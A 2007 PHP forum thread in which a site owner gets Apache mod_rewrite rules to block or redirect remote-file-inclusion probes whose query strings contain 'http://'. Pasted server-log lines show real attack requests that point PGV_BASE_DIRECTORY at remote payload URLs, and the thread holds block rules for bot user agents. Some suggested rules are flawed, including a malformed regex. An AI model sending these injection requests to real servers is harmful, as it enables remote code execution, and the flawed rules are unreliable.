Redirection based on Query string
This is a discussion on Redirection based on Query string within the alt.comp.lang.php forums, part of the PHP Programming Forums category; Hi. I'm very new to PHP, and just want to stop some attacks, and spammers. They all are using =...
|
|||||||
| FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read |
09-08-2007
|
|||
|
|||
Redirection based on Query string
Hi.
I'm very new to PHP, and just want to stop some attacks, and spammers. They all are using =http:// in the query string, I know that I will stop some other visitors too. Is it possible to put a script in my index.php to redirect people / robots using such commands / remote attacks? If so, I would like an example please! I would like to redirect them to another place that is banning them from my site. I've tried using query_sting in htaccess without any luck. Thank-You Regards, Trond 
|
|
09-09-2007
|
|||
|
|||
|
Re: Redirection based on Query string
Reffo wrote:
> Hi. Hi Reffo, > > I'm very new to PHP, and just want to stop some attacks, and spammers. > > They all are using =http:// in the query string, Not a php answer, but as you are using Apache, you might try RewriteEngine on RewriteCond %{QUERY_STRING} .*http:\/\/.* Rewriterule ^(.*) /ignore [F] This will return a "forbidden 403" error to any url where the query string contains http:// anywhere in it. I know that I will stop > some other > visitors too. Nah. I can't think of a legitimate visitor ever needing to put this in the query string. > > Is it possible to put a script in my index.php to redirect people / robots > using > such commands / remote attacks? If so, I would like an example please! > It could be done with php, but the above will be quicker, and cover all file pages, not just index.php. > I would like to redirect them to another place that is banning them from my > site. I don't understand what this means. You could send then elsewhere with Rewriterule ^(.*) http://www.elsewhere.com/ [L] in place of the Rewriterule above. > > I've tried using query_sting in htaccess without any luck. > You can place the code above in server config (anywhere in hpptd.conf), virtual host, directory, or .htaccess context. For .htaccess to work allowoverride must not be none. For anything to work. mod-rewrite must be loaded. i.e. you find a line in httpd.comf that is like... LoadModule rewrite_module modules/mod_rewrite.so And remove any leading # Regards Ian
|
|
09-09-2007
|
|||
|
|||
|
Re: Redirection based on Query string
"Ian Hobson" <ian.hobson@ntlworld.com> skrev i melding news:ZtGEi.28744$Db6.19105@newsfe3-win.ntli.net... > Reffo wrote: >> Hi. > > Hi Reffo, > >> >> I'm very new to PHP, and just want to stop some attacks, and spammers. >> >> They all are using =http:// in the query string, > > Not a php answer, but as you are using Apache, you might try > > RewriteEngine on > RewriteCond %{QUERY_STRING} .*http:\/\/.* > Rewriterule ^(.*) /ignore [F] > > This will return a "forbidden 403" error to any url where the query string > contains http:// anywhere in it. > > I know that I will stop >> some other >> visitors too. > Nah. > I can't think of a legitimate visitor ever needing to put this in the > query string. Hi. Yes, The AltaVista transaltor an other web based translators is using =http But, thank you. At least I have a start for now, I've tested it, and it's working. The bad beavhiors is writtened in the htaccess file. If I find any leagal engine that uses this strings, I only have to remove them from the htaccess file. They won't be banned anymore. Than-You once again! Regards, Trond >> >> Is it possible to put a script in my index.php to redirect people / >> robots using >> such commands / remote attacks? If so, I would like an example please! >> > It could be done with php, but the above will be quicker, and cover all > file pages, not just index.php. > >> I would like to redirect them to another place that is banning them from >> my site. > I don't understand what this means. > > You could send then elsewhere with > > Rewriterule ^(.*) http://www.elsewhere.com/ [L] > > in place of the Rewriterule above. >> >> I've tried using query_sting in htaccess without any luck. >> > > You can place the code above in server config (anywhere in hpptd.conf), > virtual host, directory, or .htaccess context. For .htaccess to work > allowoverride must not be none. > > For anything to work. mod-rewrite must be loaded. i.e. you find a line in > httpd.comf that is like... > > LoadModule rewrite_module modules/mod_rewrite.so > > And remove any leading # > > Regards > > Ian
|
|
09-09-2007
|
|||
|
|||
|
Re: Redirection based on Query string
On Sep 9, 4:33 am, "Reffo" <min_onkels_nevoe@varm_mail.com> wrote:
> "Ian Hobson" <ian.hob...@ntlworld.com> skrev i meldingnews:ZtGEi.28744$Db6.19105@newsfe3-win.ntli.net... > > > Reffo wrote: > >> Hi. > > > Hi Reffo, > > >> I'm very new to PHP, and just want to stop some attacks, and spammers. > > >> They all are using =http:// in the query string, > > > Not a php answer, but as you are using Apache, you might try > > > RewriteEngine on > > RewriteCond %{QUERY_STRING} .*http:\/\/.* > > Rewriterule ^(.*) /ignore [F] > > > This will return a "forbidden 403" error to any url where the query string > > contains http:// anywhere in it. > > > I know that I will stop > >> some other > >> visitors too. > > Nah. > > I can't think of a legitimate visitor ever needing to put this in the > > query string. > > Hi. Yes, The AltaVista transaltor an other web based translators is using > =http > > But, thank you. At least I have a start for now, I've tested it, and it's > working. > The bad beavhiors is writtened in the htaccess file. > > If I find any leagal engine that uses this strings, I only have to remove > them from > the htaccess file. They won't be banned anymore. > > Than-You once again! > > Regards, > Trond > > > > >> Is it possible to put a script in my index.php to redirect people / > >> robots using > >> such commands / remote attacks? If so, I would like an example please! > > > It could be done with php, but the above will be quicker, and cover all > > file pages, not just index.php. > > >> I would like to redirect them to another place that is banning them from > >> my site. > > I don't understand what this means. > > > You could send then elsewhere with > > > Rewriterule ^(.*) http://www.elsewhere.com/[L] > > > in place of the Rewriterule above. > > >> I've tried using query_sting in htaccess without any luck. > > > You can place the code above in server config (anywhere in hpptd.conf), > > virtual host, directory, or .htaccess context. For .htaccess to work > > allowoverride must not be none. > > > For anything to work. mod-rewrite must be loaded. i.e. you find a line in > > httpd.comf that is like... > > > LoadModule rewrite_module modules/mod_rewrite.so > > > And remove any leading # > > > Regards > > > Ian you could also install the mod_security module and visit the "cool rules" project to get a load of rules to protect your server form all kinds of attacks not just the one you mentioned. I recommend this as it gives you peace of mind when you see worms and other nasties in your logs.
|
|
09-09-2007
|
|||
|
|||
|
Re: Redirection based on Query string
> you could also install the mod_security module and visit the "cool > rules" project to get a load of rules to protect your server form all > kinds of attacks not just the one you mentioned. I recommend this as > it gives you peace of mind when you see worms and other nasties in > your logs. > As I dont have my own IP Yet, I'm reting it from my host, including space. it's very free, but ,................
|
|
09-10-2007
|
|||
|
|||
|
Re: Redirection based on Query string
>> >> They all are using =http:// in the query string, > > Not a php answer, but as you are using Apache, you might try > > RewriteEngine on > RewriteCond %{QUERY_STRING} .*http:\/\/.* > Rewriterule ^(.*) /ignore [F] > I've checked my serverlogs and it seems like this doesn't catch everyone who is using this command. Regards, Trond
|
|
09-10-2007
|
|||
|
|||
|
Re: Redirection based on Query string
Reffo wrote:
>>> They all are using =http:// in the query string, >> Not a php answer, but as you are using Apache, you might try >> >> RewriteEngine on >> RewriteCond %{QUERY_STRING} .*http:\/\/.* >> Rewriterule ^(.*) /ignore [F] >> > I've checked my serverlogs and it seems like this doesn't catch everyone who > is > using this command. > Hi Reffo, Can you post the relevant part of your log file, so I can see what is going wrong? Regards Ian
|
|
09-10-2007
|
|||
|
|||
|
Re: Redirection based on Query string
> Hi Reffo,
> > Can you post the relevant part of your log file, so I can see what is > going wrong? > > Regards > > Ian > Hi. Here's one example: 66.118.176.78 - - [09/Sep/2007:08:35:14 +0200] "GET /index.php?newlang=norwegian/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 302 340 "-" "libwww-perl/5.807" 66.118.176.78 - - [09/Sep/2007:08:35:19 +0200] "GET /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 302 301 "-" "libwww-perl/5.807" As you see, the person is getting a 302, but is not redirected. Here's another log where the person is getting a 501 error cpanel.fs-host.com - - [09/Sep/2007:17:29:14 +0200] "GET /index.php?name=Downloads&file=details&id=14/phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 501 215 "-" "libwww-perl/5.808" cpanel.fs-host.com - - [09/Sep/2007:17:29:15 +0200] "GET /phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 501 231 "-" "libwww-perl/5.808" Regards, Trond
|
|
09-10-2007
|
|||
|
|||
|
Re: Redirection based on Query string
> Hi Reffo,
> > Can you post the relevant part of your log file, so I can see what is > going wrong? > > Regards > > Ian Here's the part of the htaccess file regarding this redirection: RewriteEngine On RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC,OR] RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.* [NC] Rewriterule ^(.*) /btrap [R,L] RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^lwp [NC] RewriteRule ^(.*) /btrap/index.php [R,L] RewriteCond %{HTTP_REFERER} \.cn [NC,OR] RewriteCond %{HTTP_REFERER} moretrash\.com RewriteRule .* - [F] -Trond
|
|
09-11-2007
|
|||
|
|||
|
Re: Redirection based on Query string
Reffo wrote:
>> Hi Reffo, >> >> Can you post the relevant part of your log file, so I can see what is >> going wrong? >> >> Regards >> >> Ian >> > Hi. > > Here's one example: > > 66.118.176.78 - - [09/Sep/2007:08:35:14 +0200] "GET > /index.php?newlang=norwegian/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? > HTTP/1.1" 302 340 "-" "libwww-perl/5.807" > > 66.118.176.78 - - [09/Sep/2007:08:35:19 +0200] "GET > /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? > HTTP/1.1" 302 301 "-" "libwww-perl/5.807" > > As you see, the person is getting a 302, but is not redirected. > The code was giving the 302, because that is what the [F] told it to do. I think you need 3 lines in your .htaccess file only RewriteEngine on RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC] RewriteRule ^/.*) /btrap/index.php [L,R] This will send them to your /btrap/index.php file, where you can create a suitable page for them. If you want to send them to another site, the last line is... RewriteRule ^/(.*) http://fully.qualified.domain.name/$1 [L,R] I don't think the other entries are necessary. Regards Ian
|
 |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT +1. The time now is 08:43 AM.
